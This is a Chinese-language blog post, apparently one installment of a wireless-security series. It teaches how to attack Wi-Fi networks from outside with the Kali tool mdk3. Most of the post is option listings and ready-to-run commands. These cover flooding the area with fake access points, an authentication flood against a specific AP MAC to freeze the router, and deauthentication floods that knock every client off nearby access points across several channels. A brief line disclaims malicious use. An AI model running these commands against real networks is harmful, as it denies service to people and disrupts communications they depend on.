中秋節玩的比較嗨,無線安全專題的文章就拖沓了一下,見諒見諒。。。上篇講解了無線安全專題_破解篇03--打造個人字典,有感興趣的朋友給我私信,還有在公眾號中給我留言說,希望我講解一下彩虹表和GPU破解的事情,所以我為了響應大家的需求,我之后會在破解篇中再增加一篇專門講解彩虹表和GPU破解的問題。今天咱們就開啟無線安全專題下一篇:攻擊篇。攻擊篇主要分為兩個部分:一個是不連接上無線下的攻擊,一個是連接上無線下的攻擊。本次講解的就是如何在不連接無線的情況下進行攻擊(僅僅是討論技術,切不要進行惡意使用),主要使用的工具是kali下面的mdk3。(我的新書《Python爬蟲開發與項目實戰》出版了,大家可以看一下樣章)
一.偽造大量的死亡AP信號,干擾通信
首先咱們將無線網卡切換到監聽模式(怎么切換的,請看我之前寫的文章),偽造大量的AP信號使用的是mdk3的b參數。
- b - Beacon Flood Mode
- Sends beacon frames to show fake APs at clients.
- This can sometimes crash network scanners and even drivers!
- OPTIONS:
- -n <ssid> Use SSID <ssid> instead of randomly generated ones 給AP信號指定名稱,不使用就隨機生成
- -f <filename> Read SSIDs from file 可以從文件中讀取AP名稱
- -v <filename> Read MACs and SSIDs from file. See example file! 可以從文件中讀取ap mac和名稱
- -d Show station as Ad-Hoc 自定義為Ad-Hoc模式
- -w Set WEP bit (Generates encrypted networks) 自定義為wep加密
- -g Show station as 54 Mbit 自定義為54M模式
- -t Show station using WPA TKIP encryption 自定義為wpa TKIP 加密
- -a Show station using WPA AES encryption 自定義為wpa AES 加密
- -m Use valid accesspoint MAC from OUI database 讀取數據庫中的mac
- -h Hop to channel where AP is spoofed。This makes the test more effective against some devices/drivers。But it reduces packet rate due to channel hopping.
- -c <chan> Fake an AP on channel <chan>. If you want your card to hop onl, this channel, you have to set -h option, too! 自定義信道
- -s <pps> Set speed in packets per second (Default: 50) 自定義發包速率
1.1 偽造一個名稱為為qiye1,信道為1,發包速率為200的AP信號
- mdk3 wlan1 b -n qiye1 -c 1 -p 200
1.2 偽造一個名稱為為qiye1,信道為1,發包速率為200,加密方式為wpa AES的AP信號
- mdk3 wlan1 b -n qiye1 -c 1 -p 200 -a
從手機上可以看到qiye1這個信號是加密的。
1.3 根據文件中的名稱偽造AP信號,信道為2。
- mdk3 wlan1 b -f FakeAPName.txt -c 2
執行完成后,在電腦上可以看到下圖的效果,顯示了我自定義文件中的AP名稱:
1.4 隨機偽造大量ap信號,信道為1
- mdk3 wlan1 b -g -c 1
電腦上會顯示各種亂七八糟命名的無線信號,填滿整個無線列表。
二.驗證洪水攻擊方式,干擾通信,甚至可以干掉無線路由。
mdk3自動模擬隨機產生的mac向目標AP發起大量驗證請求,可以導致AP忙於處理過多的請求而停止對正常連接客戶端的響應,這個可以用來強迫用戶重啟路由。
- a - Authentication DoS mode
- Sends authentication frames to all APs found in range.
- Too much clients freeze or reset almost every AP.
- OPTIONS:
- -a <ap_mac> Only test the specified AP 攻擊目標AP的mac,可以看之前的欺騙篇,可以知道怎么回去ap mac
- -m Use valid client MAC from OUI database 使用數據庫中mac
- -c Do NOT check for test being successful 不檢測測試是否成功
- -i <ap_mac> Perform intelligent test on AP (-a and -c will be ignored) 智能測試
- This test connects clients to the AP and reinjects sniffed data to keep them alive
- -s <pps> Set speed in packets per second (Default: unlimited) 發包速率
攻擊名稱為qiye,mac地址為FC:D7:33:DE:F3:8A的無線AP。
- mdk3 wlan1 a -a FC:D7:33:DE:F3:8A -c -s 300
發起攻擊后,一直處於連接狀態,直到超時。手機也是這種情況,點擊連接后沒有什么反應。
三.強制解除驗證洪水攻擊方式。
在這種模式下,軟件會想周圍所有的AP發送強制解除驗證數據包,迫使所有連接上AP的客戶端掉線,無響應。
- d - Deauthentication / Disassociation Amok Mode
- Kicks everybody found from AP
- OPTIONS:
- -w <filename> Read file containing MACs not to care about (Whitelist mode) 指定白名單mac
- -b <filename> Read file containing MACs to run test on (Blacklist Mode) 指定mac黑名單
- -s <pps> Set speed in packets per second (Default: unlimited) 發包速率
- -c [chan,chan,chan,...] Enable channel hopping. Without providing any channels, mdk3 will hop an all 14 b/g channels. Channel will be changed every 5 seconds.指定信道,可以用逗號分隔多個信道
3.1 攻擊名稱為qiye,mac地址為FC:D7:33:DE:F3:8A的無線AP,使我客戶端掉線無法上網。
- mdk3 wlan1 d -b blacklist.txt
電腦掉線之后重新連接,發現已經連不上了。
3.2 直接按照信道進行全范圍攻擊
直接將我掃描到的所有信道進行攻擊。
- mdk3 wlan1 d -c 6,11,4,3,13,7
今天的分享就到這里,下一篇繼續分析。如果大家覺得還可以呀,記得推薦呦。

歡迎大家支持我公眾號:

本文章屬於原創作品,歡迎大家轉載分享。尊重原創,轉載請注明來自:七夜的故事 http://www.cnblogs.com/qiyeboy/